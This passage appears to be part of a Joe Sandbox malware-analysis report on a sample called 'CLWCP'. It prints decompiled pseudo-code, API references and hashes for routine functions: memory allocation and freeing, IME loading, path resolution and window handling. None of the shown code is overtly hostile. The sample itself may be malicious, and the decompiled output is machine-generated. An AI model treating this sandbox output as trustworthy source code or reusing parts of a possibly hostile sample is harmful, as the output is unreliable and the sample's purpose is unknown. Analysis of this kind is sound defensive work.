                                  0x00401679
                                  0x0040167b
                                  0x0040167b
                                  0x00401687
                                  0x00401687
                                  0x00401649
                                  0x0040168c
                                  0x0040168c
                                  0x00401696
                                  0x0040169c
                                  0x004016a3
                                  0x004016c5
                                  0x004016c5
                                  0x004016ad
                                  0x004016b3
                                  0x004016bb
                                  0x00000000

                                  APIs
                                  • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 00401672
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: ba80249a251de3ee35997ace5fbe70d6b1e1dbc426a0e22c7ca5c8142151c2d6
                                  • Instruction ID: 460f9af4ca393ca96be781d807a8049ba666e12b5de7044a0a5d5bfc730e7340
                                  • Opcode Fuzzy Hash: ba80249a251de3ee35997ace5fbe70d6b1e1dbc426a0e22c7ca5c8142151c2d6
                                  • Instruction Fuzzy Hash: 9921EA706043119FC710DF19C880A5BB7E1EF84764F19C96AE8989B3A5D735EC81CF9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004016C8, Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004016C8(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x4705e8; // 0x4705e8
				while(_t29 != 0x4705e8) {
					_t7 = _t29 + 8; // 0x0
					_t17 =  *_t7;
					_t8 = _t29 + 0xc; // 0x0
					_t27 =  *_t8 + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                  0x004016cf
                                  0x004016d3
                                  0x004016da
                                  0x004016ef
                                  0x004016f7
                                  0x004016fd
                                  0x00401703
                                  0x00401706
                                  0x0040174a
                                  0x0040170e
                                  0x0040170e
                                  0x00401711
                                  0x00401714
                                  0x00401718
                                  0x0040171a
                                  0x0040171a
                                  0x00401720
                                  0x00401722
                                  0x00401722
                                  0x00401728
                                  0x00401735
                                  0x0040173c
                                  0x0040173e
                                  0x00401744
                                  0x00000000
                                  0x00401744
                                  0x0040173c
                                  0x00401748
                                  0x00401748
                                  0x00401759

                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00401735
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 472705cc0e5028a4bb68b267383b8ea3bd30d081b1d04a6e844344bec03b5a4a
                                  • Instruction ID: 84ced009f6227253d2ecc12a81caae514daf4775232f95a49e6e6887a6054668
                                  • Opcode Fuzzy Hash: 472705cc0e5028a4bb68b267383b8ea3bd30d081b1d04a6e844344bec03b5a4a
                                  • Instruction Fuzzy Hash: C6118E76A057059FC310DF29C880A2BB7E5EFC4761F15C53EE598A73A4D734AC408B49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041AB90, Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041AB90(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x470888 == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x470884; // 0x22f0000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E00402990(0x46e3e8, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E0041AB88(_t2, E0041AB68);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E0041AB88(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x470888;
						 *0x470888 = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x470884 = _t35;
				}
				_t25 =  *0x470888;
				 *0x470888 =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x470888;
			}








                                  0x0041ab9e
                                  0x0041abae
                                  0x0041abb3
                                  0x0041abb5
                                  0x0041abba
                                  0x0041abbc
                                  0x0041abc9
                                  0x0041abd3
                                  0x0041abdb
                                  0x0041abde
                                  0x0041abde
                                  0x0041abe1
                                  0x0041abe1
                                  0x0041abe4
                                  0x0041abee
                                  0x0041abf3
                                  0x0041abf6
                                  0x0041abf8
                                  0x0041abff
                                  0x0041ac06
                                  0x0041ac06
                                  0x0041ac0e
                                  0x0041ac13
                                  0x0041ac18
                                  0x0041ac1e
                                  0x0041ac25

                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041ABAE
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 8d71270949e3a87b428584108315775b512043441b7fb5b769041ea24da1b128
                                  • Instruction ID: 5b564f1200556666a5d032e6845c0c23a100170eb02ad4eeaf4953249a448201
                                  • Opcode Fuzzy Hash: 8d71270949e3a87b428584108315775b512043441b7fb5b769041ea24da1b128
                                  • Instruction Fuzzy Hash: FE119E742453058FC310DF19C880B86F7E1EF48390F14C53AE9988B385D374E8518BAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040175C, Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E0040175C(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x4705e8; // 0x4705e8
				while(_t19 != 0x4705e8) {
					_t2 = _t19 + 8; // 0x0
					_t9 =  *_t2;
					_t3 = _t19 + 0xc; // 0x0
					_t14 =  *_t3 + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x4705c4 = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}









                                  0x00401760
                                  0x00401771
                                  0x00401778
                                  0x00401781
                                  0x00401785
                                  0x00401788
                                  0x0040178b
                                  0x004017cb
                                  0x00401793
                                  0x00401793
                                  0x00401796
                                  0x00401799
                                  0x0040179e
                                  0x004017a0
                                  0x004017a0
                                  0x004017a5
                                  0x004017a7
                                  0x004017a7
                                  0x004017ab
                                  0x004017b6
                                  0x004017bd
                                  0x004017bf
                                  0x004017bf
                                  0x004017bd
                                  0x004017c9
                                  0x004017c9
                                  0x004017d8

                                  APIs
                                  • VirtualFree.KERNEL32(00000000,00000000,00004000,?,?,?,?,?,004019C3), ref: 004017B6
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: ade74023f2782f7dc78d4e45098a811d16bc0b53614a6118611f4b72f8f164e6
                                  • Instruction ID: 9dd01667c080499e3d5f3b6146f1a75adcdb4b2a221b3398bc89655277111eb7
                                  • Opcode Fuzzy Hash: ade74023f2782f7dc78d4e45098a811d16bc0b53614a6118611f4b72f8f164e6
                                  • Instruction Fuzzy Hash: EA01F77A6052049FC310DE29DCC0A2A77E8EB84364F15453EDA88AB391D33A6C458BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004161A4, Relevance: 1.3, APIs: 1, Instructions: 21COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004161A4(signed int __edx) {
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t6;
				signed int _t10;

				_t3 = E00403764(_t2, __edx);
				_t10 = __edx;
				_t14 = _t3;
				_t4 =  *(_t3 + 4);
				if(_t4 >= 0) {
					CloseHandle(_t4); // executed
				}
				_t6 = E00403388(_t10 & 0x000000fc);
				if(_t10 > 0) {
					return E0040370C(_t14);
				}
				return _t6;
			}








                                  0x004161a6
                                  0x004161ab
                                  0x004161ad
                                  0x004161af
                                  0x004161b4
                                  0x004161b7
                                  0x004161b7
                                  0x004161c3
                                  0x004161ca
                                  0x00000000
                                  0x004161ce
                                  0x004161d5

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: 1c668aa86592ff6cb53c1dbe63481fdc2a545734b5b6fa1e5ff1f7f5f5bd8094
                                  • Instruction ID: d51b83a6ae76d7c9953a79ad3501f6c6cda8f639d4b1248b7be0fa268f9fc90d
                                  • Opcode Fuzzy Hash: 1c668aa86592ff6cb53c1dbe63481fdc2a545734b5b6fa1e5ff1f7f5f5bd8094
                                  • Instruction Fuzzy Hash: EAD05EB1700B201286117A7E1DC268B5A8C4E426AA309863EF854EB2D3EB3DCE01429C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00440A48, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E00440A48() {
				int _v8;
				intOrPtr _t4;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t29;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t44;

				_t42 = _t44;
				_t4 =  *0x46fdc8; // 0x470744
				if( *((char*)(_t4 + 0xc)) == 0) {
					return _t4;
				} else {
					_v8 = SetErrorMode(0x8000);
					_push(_t42);
					_push(0x440bae);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					if( *0x470af4 == 0) {
						 *0x470af4 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
					}
					if( *0x46ee1c == 0) {
						 *0x46ee1c = LoadLibraryA("imm32.dll");
						if( *0x46ee1c != 0) {
							_t11 =  *0x46ee1c; // 0x0
							 *0x470af8 = GetProcAddress(_t11, "ImmGetContext");
							_t13 =  *0x46ee1c; // 0x0
							 *0x470afc = GetProcAddress(_t13, "ImmReleaseContext");
							_t15 =  *0x46ee1c; // 0x0
							 *0x470b00 = GetProcAddress(_t15, "ImmGetConversionStatus");
							_t17 =  *0x46ee1c; // 0x0
							 *0x470b04 = GetProcAddress(_t17, "ImmSetConversionStatus");
							_t19 =  *0x46ee1c; // 0x0
							 *0x470b08 = GetProcAddress(_t19, "ImmSetOpenStatus");
							_t21 =  *0x46ee1c; // 0x0
							 *0x470b0c = GetProcAddress(_t21, "ImmSetCompositionWindow");
							_t23 =  *0x46ee1c; // 0x0
							 *0x470b10 = GetProcAddress(_t23, "ImmSetCompositionFontA");
							_t25 =  *0x46ee1c; // 0x0
							 *0x470b14 = GetProcAddress(_t25, "ImmGetCompositionStringA");
							_t27 =  *0x46ee1c; // 0x0
							 *0x470b18 = GetProcAddress(_t27, "ImmIsIME");
							_t29 =  *0x46ee1c; // 0x0
							 *0x470b1c = GetProcAddress(_t29, "ImmNotifyIME");
						}
					}
					_pop(_t40);
					 *[fs:eax] = _t40;
					_push(0x440bb5);
					return SetErrorMode(_v8);
				}
			}


















                                  0x00440a49
                                  0x00440a4d
                                  0x00440a56
                                  0x00440bb8
                                  0x00440a5c
                                  0x00440a66
                                  0x00440a6b
                                  0x00440a6c
                                  0x00440a71
                                  0x00440a74
                                  0x00440a7e
                                  0x00440a97
                                  0x00440a97
                                  0x00440aa3
                                  0x00440ab3
                                  0x00440abf
                                  0x00440aca
                                  0x00440ad5
                                  0x00440adf
                                  0x00440aea
                                  0x00440af4
                                  0x00440aff
                                  0x00440b09
                                  0x00440b14
                                  0x00440b1e
                                  0x00440b29
                                  0x00440b33
                                  0x00440b3e
                                  0x00440b48
                                  0x00440b53
                                  0x00440b5d
                                  0x00440b68
                                  0x00440b72
                                  0x00440b7d
                                  0x00440b87
                                  0x00440b92
                                  0x00440b92
                                  0x00440abf
                                  0x00440b99
                                  0x00440b9c
                                  0x00440b9f
                                  0x00440bad
                                  0x00440bad

                                  APIs
                                  • SetErrorMode.KERNEL32(00008000), ref: 00440A61
                                  • GetModuleHandleA.KERNEL32(USER32,00000000,00440BAE,?,00008000), ref: 00440A85
                                  • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00440A92
                                  • LoadLibraryA.KERNEL32(imm32.dll,00000000,00440BAE,?,00008000), ref: 00440AAE
                                  • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00440AD0
                                  • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00440AE5
                                  • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00440AFA
                                  • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00440B0F
                                  • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00440B24
                                  • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00440B39
                                  • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00440B4E
                                  • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00440B63
                                  • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00440B78
                                  • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00440B8D
                                  • SetErrorMode.KERNEL32(?,00440BB5,00008000), ref: 00440BA8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                  • String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                                  • API String ID: 3397921170-3950384806
                                  • Opcode ID: 0416b1b5c3b3c8ee46c135cc34149c0ad09557ae09a3595f8f73b8d56c264787
                                  • Instruction ID: c8ab60e8da90c3335b729d234f80af5c7a187982ff55dbe7744613ebb3b96525
                                  • Opcode Fuzzy Hash: 0416b1b5c3b3c8ee46c135cc34149c0ad09557ae09a3595f8f73b8d56c264787
                                  • Instruction Fuzzy Hash: 8B313E74785340EEE704EBE2DC46E1637E8E344708B11447AF605DB291E6FEA9A08F1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405210, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E00405210(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				struct _WIN32_FIND_DATAA _v338;
				char _v599;
				char* _t65;
				char* _t75;
				void* _t95;
				intOrPtr* _t96;
				char* _t99;
				char* _t101;
				char* _t102;
				void* _t103;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_v20 = GetModuleHandleA("kernel32.dll");
				if(_v20 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t101 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t102 = E004051F0(_v8 + 2);
							if( *_t102 != 0) {
								_t17 = _t102 + 1; // 0x1
								_t101 = E004051F0(_t17);
								if( *_t101 != 0) {
									L10:
									_t95 = _t101 - _v8;
									_push(_t95 + 1);
									_push(_v8);
									_push( &_v599);
									L004012A4();
									while( *_t101 != 0) {
										_t99 = E004051F0(_t101 + 1);
										if(_t99 - _t101 + _t95 + 1 <= 0x105) {
											_push(_t99 - _t101 + 1);
											_push(_t101);
											_push( &(( &_v599)[_t95]));
											L004012A4();
											_v20 = FindFirstFileA( &_v599,  &_v338);
											if(_v20 != 0xffffffff) {
												FindClose(_v20);
												_t65 =  &(_v338.cFileName);
												_push(_t65);
												L004012AC();
												if(_t65 + _t95 + 1 + 1 <= 0x105) {
													 *((char*)(_t103 + _t95 - 0x253)) = 0x5c;
													_push(0x105 - _t95 - 1);
													_push( &(_v338.cFileName));
													_push( &(( &(( &_v599)[_t95]))[1]));
													L004012A4();
													_t75 =  &(_v338.cFileName);
													_push(_t75);
													L004012AC();
													_t95 = _t95 + _t75 + 1;
													_t101 = _t99;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v599);
									_push(_v8);
									L004012A4();
								}
							}
						}
					}
				} else {
					_t96 = GetProcAddress(_v20, "GetLongPathNameA");
					if(_t96 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v599);
						_push(_v8);
						if( *_t96() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v599);
							_push(_v8);
							L004012A4();
						}
					}
				}
				L17:
				return _v16;
			}

















                                  0x0040521c
                                  0x0040521f
                                  0x00405225
                                  0x00405232
                                  0x00405239
                                  0x0040527e
                                  0x00405284
                                  0x004052c1
                                  0x00000000
                                  0x00405286
                                  0x0040528d
                                  0x0040529e
                                  0x004052a3
                                  0x004052a9
                                  0x004052b1
                                  0x004052b6
                                  0x004052c4
                                  0x004052c6
                                  0x004052cc
                                  0x004052d0
                                  0x004052d7
                                  0x004052d8
                                  0x00405389
                                  0x004052ea
                                  0x004052f8
                                  0x00405303
                                  0x00405304
                                  0x0040530d
                                  0x0040530e
                                  0x00405326
                                  0x0040532d
                                  0x00405333
                                  0x00405338
                                  0x0040533e
                                  0x0040533f
                                  0x0040534f
                                  0x00405351
                                  0x00405361
                                  0x00405368
                                  0x00405372
                                  0x00405373
                                  0x00405378
                                  0x0040537e
                                  0x0040537f
                                  0x00405385
                                  0x00405387
                                  0x00000000
                                  0x00405387
                                  0x0040534f
                                  0x0040532d
                                  0x00000000
                                  0x004052f8
                                  0x00405395
                                  0x0040539c
                                  0x004053a0
                                  0x004053a1
                                  0x004053a1
                                  0x004052b6
                                  0x004052a3
                                  0x0040528d
                                  0x0040523b
                                  0x00405249
                                  0x0040524d
                                  0x00000000
                                  0x0040524f
                                  0x0040524f
                                  0x0040525a
                                  0x0040525e
                                  0x00405263
                                  0x00000000
                                  0x00405265
                                  0x00405268
                                  0x0040526f
                                  0x00405273
                                  0x00405274
                                  0x00405274
                                  0x00405263
                                  0x0040524d
                                  0x004053a6
                                  0x004053af

                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040522D
                                  • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 00405244
                                  • lstrcpyn.KERNEL32(?,?,?), ref: 00405274
                                  • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,?,00000000), ref: 004052D8
                                  • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,?,00000000), ref: 0040530E
                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,00000000), ref: 00405321
                                  • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,00000000), ref: 00405333
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,00000000), ref: 0040533F
                                  • lstrcpyn.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?), ref: 00405373
                                  • lstrlen.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?), ref: 0040537F
                                  • lstrcpyn.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 004053A1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                  • API String ID: 3245196872-1565342463
                                  • Opcode ID: b26e80cfdf313e5ddb96466e9586d9babe9bdbeed04ebb562e664aae5d92ee83
                                  • Instruction ID: 7123bbd571bc78044769ff3f97ec35de03461e648d62ba97593c837f7c754d18
                                  • Opcode Fuzzy Hash: b26e80cfdf313e5ddb96466e9586d9babe9bdbeed04ebb562e664aae5d92ee83
                                  • Instruction Fuzzy Hash: CF416D71D00658ABDB10DAE8CC89ADFB7ACEF08344F0404FAA545F7282D7789E448F58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00452098, Relevance: 19.9, APIs: 13, Instructions: 428windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E00452098(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _t157;
				intOrPtr _t161;
				intOrPtr _t163;
				intOrPtr _t164;
				intOrPtr _t165;
				intOrPtr _t169;
				intOrPtr _t174;
				intOrPtr _t176;
				intOrPtr _t177;
				void* _t179;
				struct HWND__* _t180;
				long _t190;
				signed int _t212;
				signed int _t213;
				long _t234;
				intOrPtr _t240;
				int _t245;
				intOrPtr _t246;
				intOrPtr _t255;
				intOrPtr _t259;
				signed int _t262;
				signed int _t265;
				intOrPtr _t266;
				signed int _t272;
				long _t273;
				intOrPtr _t276;
				intOrPtr _t280;
				signed int _t283;
				intOrPtr _t284;
				intOrPtr _t285;
				signed int _t291;
				long _t292;
				intOrPtr _t295;
				signed int _t301;
				signed int _t302;
				void* _t304;
				long _t307;
				intOrPtr _t311;
				struct HWND__* _t316;
				signed int _t318;
				signed int _t319;
				signed int _t322;
				signed int _t324;
				long _t325;
				signed int _t328;
				signed int _t330;
				long _t331;
				void* _t333;
				intOrPtr _t347;
				signed int _t380;
				signed int _t381;
				intOrPtr _t382;
				long _t390;
				void* _t392;
				void* _t393;
				intOrPtr _t394;

				_t392 = _t393;
				_t394 = _t393 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t392);
				_push(0x452647);
				_push( *[fs:eax]);
				 *[fs:eax] = _t394;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x328) & 0x00000004) != 0) {
					_t311 =  *0x46fdb4; // 0x41b648
					E00405C70(_t311,  &_v12);
					E0040B830(_v12, 1);
					E00403B64();
				}
				_t157 =  *0x470b40; // 0x0
				E00456FBC(_t157);
				 *(_v8 + 0x328) =  *(_v8 + 0x328) | 0x00000004;
				_push(_t392);
				_push(0x45262a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t394;
				if(( *(_v8 + 0x1c) & 0x00000010) != 0) {
					_t161 = _v8;
					__eflags =  *(_t161 + 0x1c) & 0x00000010;
					if(( *(_t161 + 0x1c) & 0x00000010) != 0) {
						_t164 = _v8;
						__eflags =  *(_t164 + 0x30);
						if( *(_t164 + 0x30) != 0) {
							_t165 = _v8;
							__eflags =  *((char*)(_t165 + 0x1ae));
							if( *((char*)(_t165 + 0x1ae)) != 0) {
								ShowWindow(E0043BA58(_v8), 1);
							}
						}
					}
					L82:
					_pop(_t347);
					 *[fs:eax] = _t347;
					_push(0x452631);
					_t163 = _v8;
					 *(_t163 + 0x328) =  *(_t163 + 0x328) & 0x000000fb;
					return _t163;
				}
				_t169 = _v8;
				_t398 =  *((char*)(_t169 + 0x1ae));
				if( *((char*)(_t169 + 0x1ae)) == 0) {
					_push(_t392);
					_push(0x4524fb);
					_push( *[fs:eax]);
					 *[fs:eax] = _t394;
					E00403594(_v8, __eflags);
					 *[fs:eax] = 0;
					_t174 =  *0x470b44; // 0x0
					__eflags =  *((intOrPtr*)(_t174 + 0x6c)) - _v8;
					if( *((intOrPtr*)(_t174 + 0x6c)) == _v8) {
						__eflags = 0;
						E00451074(_v8, 0);
					}
					_t176 = _v8;
					__eflags =  *((char*)(_t176 + 0x247)) - 1;
					if( *((char*)(_t176 + 0x247)) != 1) {
						_t177 = _v8;
						__eflags =  *(_t177 + 0x328) & 0x00000008;
						if(( *(_t177 + 0x328) & 0x00000008) == 0) {
							_t316 = 0;
							_t179 = E0043BA58(_v8);
							_t180 = GetActiveWindow();
							__eflags = _t179 - _t180;
							if(_t179 == _t180) {
								_t190 = IsIconic(E0043BA58(_v8));
								__eflags = _t190;
								if(_t190 == 0) {
									_t316 = E0044C664(E0043BA58(_v8));
								}
							}
							__eflags = _t316;
							if(_t316 == 0) {
								ShowWindow(E0043BA58(_v8), 0);
							} else {
								SetWindowPos(E0043BA58(_v8), 0, 0, 0, 0, 0, 0x97);
								SetActiveWindow(_t316);
							}
						} else {
							SetWindowPos(E0043BA58(_v8), 0, 0, 0, 0, 0, 0x97);
						}
					} else {
						 *((intOrPtr*)( *_v8 + 0xb0))();
					}
					goto L82;
				}
				_push(_t392);
				_push(0x452150);
				_push( *[fs:eax]);
				 *[fs:eax] = _t394;
				E00403594(_v8, _t398);
				 *[fs:eax] = 0;
				if( *(_v8 + 0x248) == 4 ||  *(_v8 + 0x248) == 6 &&  *((char*)(_v8 + 0x247)) == 1) {
					if( *((char*)(_v8 + 0x247)) != 1) {
						_t318 = E00453A88() -  *(_v8 + 0x48);
						__eflags = _t318;
						_t319 = _t318 >> 1;
						if(_t318 < 0) {
							asm("adc ebx, 0x0");
						}
